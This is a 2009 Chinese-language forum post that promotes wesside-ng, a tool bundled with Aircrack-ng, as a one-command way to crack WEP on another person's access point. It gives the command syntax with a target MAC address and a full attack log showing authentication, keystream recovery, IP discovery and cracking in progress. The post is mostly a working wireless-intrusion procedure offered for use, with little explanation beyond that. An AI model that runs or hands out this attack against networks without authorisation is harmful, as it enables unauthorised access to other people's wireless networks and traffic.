0556 发表于 2009-9-23 10:28:49

揭密~ 一个隐藏在AIRCRACK超好用的工具~ 一个命令自动破解WEP~

其实AIRCARCK beta 1.0的包里,藏着一个工具,一个命令就可以全自动进行破解和攻击~~
只不过目前还存在一些BUG,等待作者完善它~
wesside-ng -v (对方AP的MAC) -i (自己的网卡名)
例如 wesside-ng -v 00:C0:CA:17B:6A -i rausb0
Using mac 00:C0:CA:17B:6A
Looking for a victim...
Found SSID(teddy) BSS=(00:14:6C:7E:40:80) chan=9
Authenticated
Associated (ID=5)
Got ARP request from (000:CF:03:34:8C)
Datalen 54 Known clear 22
Got 22 bytes of prga IV=(0e:4e:02) PRGA=A5 DC C3 AF 43 34 17 0D 0D 7E 2A C1 44 8A DA 51 A4 DF BB C6 4F 3C
Got 102 bytes of prga IV=(0f:4e:02) PRGA=17 03 74 98 9F CC FB AA A1 B3 5B 00 53 EC 8F C3 BB F7 56 21 09 95 12 70 24 8C C0 16 40 9F A8 BD BA C4 CC 18 04 A1 41 47 B3 22 8B D2 42 DC 71 54 CE AD FE D0 C3 15 7E EB D1 E2 BB 69 7F 11 8A 99 40 FC 75 EC 12 BF 3B C8 2A 32 88 8A DC E8 35 7C EE DA A3 E3 6B 0C 45 21 DC BD 23 59 28 85 24 49 18 49 1C 24 6D E2
Got 342 bytes of prga IV=(10:4e:02) PRGA=5C EC 18 24 F3 21 B2 74 2A 86 97 C7 4C 22 EC 42 00 3A C6 07 0C 02 AA D6 B6 D8 FF B1 16 F8 40 31 B7 95 3B F8 1B BD 94 8B 3B 7A 98 DE C6 72 FD F8 A5 FC E7 81 A0 9E 01 76 44 57 C4 EB AE D7 AB EB 2F 40 C8 E5 5F EF 13 DB F4 F7 F2 91 D9 36 77 C1 F0 9C E4 8C BA F9 50 C0 B0 E7 23 75 85 41 82 54 F5 22 3C A9 45 0C 1F AE DA 3B F7 AA 41 30 23 63 97 B1 42 4C A8 0E C0 5A 7E A2 58 C2 02 B8 7F DB C7 CC 66 4D 86 53 30 E0 A0 81 52 13 14 08 5F 45 C5 AC 21 C3 90 86 A1 8D 45 CC 7C A2 F2 95 34 EF 38 59 FA 21 0F CC 63 81 05 26 8D B8 84 A1 D3 DF 5D E0 CA 23 52 85 4F 61 5B E3 83 4B 2A 10 0A 14 94 FA 90 D4 FC 3F 7B CD A9 C3 E3 4D B7 99 BD 21 D4 FC DB 60 0C 92 8D 76 87 EF F7 45 C6 D7 0B 96 A4 18 41 63 48 79 E0 4E 3A 9F 1B 8D 17 F5 B0 FE 30 F3 27 55 E1 EA 8A 60 FA 9E CB CE D9 1D EE 94 20 20 EB 58 F8 55 38 4F C9 E7 53 55 94 6C 6A 6D F0 D5 4E DB 78 D6 52 A3 34 68 2C 8B 7A EA C8 DA 3B D9 CB 4C 65 E6 CE B8 EE CD 58 DD C1 C8 F8 08 1B 27 EC 74 7E AD A0 0E 1E 85 79 F4 C0 54 D9 99 51 CA 96 02 73 93 33 6F E6 D5 F1 55 81 2B AA C4 3A B2 0A C6 04 FE
Guessing PRGA 8e (IP byte=230)
Got clear-text byte: 192
Guessing PRGA be (IP byte=198)
Got clear-text byte: 168
Guessing PRGA 8d (IP byte=47)
Got clear-text byte: 1
Guessing PRGA 12 (IP byte=240)
Got clear-text byte: 200
Got IP=(192.168.1.200)
My IP=(192.168.1.123)
Sending arp request for: 192.168.1.200
Got arp reply from (000:CF:03:34:8C)
WEP=000009991 (next crack at 10000) IV=60:62:02 (rate=115)
WEP=000012839 (next crack at 20000) IV=21:68:02 (rate=204)
Starting crack PID=2413
WEP=000010324 (next crack at 20000) IV=0d:63:02 (rate=183)
Starting crack PID=2415
WEP=000023769 (next crack at 30000) IV=79:32:00 (rate=252)
Starting crack PID=2414
WEP=000020320 (next crack at 30000) IV=7d:2b:00 (rate=158)
WEP=000034005 (next crack at 40000) IV=53:47:00 (rate=244)
页: [1]
查看完整版本: 揭密~ 一个隐藏在AIRCRACK超好用的工具~ 一个命令自动破解WEP~